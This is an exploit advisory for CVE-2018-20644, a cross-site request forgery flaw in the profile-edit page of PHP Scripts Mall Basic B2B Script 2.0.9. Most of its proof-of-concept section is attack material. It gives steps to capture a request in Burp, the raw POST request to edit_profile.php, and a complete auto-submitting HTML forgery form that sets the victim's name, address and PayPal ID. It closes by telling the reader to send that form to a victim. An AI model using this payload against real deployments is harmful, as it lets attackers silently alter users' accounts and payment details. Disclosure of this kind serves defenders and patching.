CVE-2018-20644-PHP Scripts Mall Basic B2B Script 2.0.9 has Cross-Site Request Forgery Vulnerability

***********************************************
# Exploit Title: PHP Scripts Mall Basic B2B Script 2.0.9 has Cross-Site Request Forgery (CSRF) via the Edit profile feature.
# Date: 30.12.2018
# Site Title : B2B Script
# Vendor Homepage: https://www.phpscriptsmall.com/
#Vendor Software : https://www.phpscriptsmall.com/product/professional-b2b-script/
# Software Link: http://readymadeb2bscript.com/basic-b2b/
# Category: Web Application
# Version: 2.0.9
# Exploit Author: Vikas Chaudhary
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
# Tested on: Windows 10 -Firefox
# CVE-2018-20644.
************************************************

## VENDOR SUMMARY :- PHP Scripts Mall Pvt. Ltd. is a professional software selling portal offering wide range of innovative. PHP Scripts Mall is a leading business and technology firm with 12 years of successful track record in completion and implementation of numerous projects in various
verticals and domains.. It has 300 plus PHP scripts ready to buy.

## Vulnerability Description=> Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
**************************************************
————————-
Proof of Concept:-
————————–
1. Go to the site (https://www.phpscriptsmall.com/product/professional-b2b-script/ ) ,Select User Demo.
2- Click on Join Free => Fill the Form and Create an Account using your name email and soo on …
3- Goto your mail and Verify it.
4-Come back to site and Login using your Verified Mail and Password.
6- Now Edit your Profile and Capture The data from Burpsuit.
7-Generate CSRF Poc from Burp and send it to Victim.
POST /basic-b2b/edit_profile.php HTTP/1.1<br /><br /><br /><br /> Host: readymadeb2bscript.com<br /><br /><br /><br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0<br /><br /><br /><br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br /><br /><br /><br /> Accept-Language: en-US,en;q=0.5<br /><br /><br /><br /> Accept-Encoding: gzip, deflate<br /><br /><br /><br /> Referer: http://readymadeb2bscript.com/basic-b2b/edit_profile.php<br /><br /><br /><br /> Content-Type: application/x-www-form-urlencoded<br /><br /><br /><br /> Content-Length: 218<br /><br /><br /><br /> Connection: close<br /><br /><br /><br /> Cookie: PHPSESSID=99f29a74dcfac63bc4b054762c8c69e6<br /><br /><br /><br /> Upgrade-Insecure-Requests: 1</p><br /><br /><br /> <p>fname=Vikas&lname=Chaudhary&gender=male&ph_no=8798798778&mble_no=2147483647&fax_no=98778768&address=kjjk&address1=nbhgb&city=bvg&state=13&country=23&zip_code=78789&cmpny_name=kjhujnjh&paypal_id=jbjh%40gmail.com&submit=<br /><br /><br /><br />

<html><br /><br /><br /> <!– CSRF PoC – generated by Burp Suite Professional –><br /><br /><br /> <body><br /><br /><br /> <script>history.pushState(”, ”, ‘/’)</script><br /><br /><br /> <form action=”http://readymadeb2bscript.com/basic-b2b/edit_profile.php” method=”POST”><br /><br /> <input type=”hidden” name=”fname” value=”Vikas” /><br /><br /><br /> <input type=”hidden” name=”lname” value=”Chaudhary” /><br /><br /><br /> <input type=”hidden” name=”gender” value=”male” /><br /><br /><br /> <input type=”hidden” name=”ph_no” value=”8798798778″ /><br /><br /><br /> <input type=”hidden” name=”mble_no” value=”2147483647″ /><br /><br /><br /> <input type=”hidden” name=”fax_no” value=”98778768″ /><br /><br /><br /> <input type=”hidden” name=”address” value=”kjjk” /><br /><br /><br /> <input type=”hidden” name=”address1″ value=”nbhgb” /><br /><br /><br /> <input type=”hidden” name=”city” value=”bvg” /><br /><br /><br /> <input type=”hidden” name=”state” value=”13″ /><br /><br /><br /> <input type=”hidden” name=”country” value=”23″ /><br /><br /><br /> <input type=”hidden” name=”zip_code” value=”78789″ /><br /><br /><br /> <input type=”hidden” name=”cmpny_name” value=”kjhujnjh” /><br /><br /><br /> <input type=”hidden” name=”paypal_id” value=”jbjh@gmail.com” /><br /><br /><br /> <input type=”hidden” name=”submit” value=”” /><br /><br /><br /> <input type=”submit” value=”Submit request” /><br /><br /><br /> </form><br /><br /> <p> </body><br /><br /><br /> </html><br /><br /><br />

8- Send it to Victim , It’s Profile will be changed according to you
**************************************************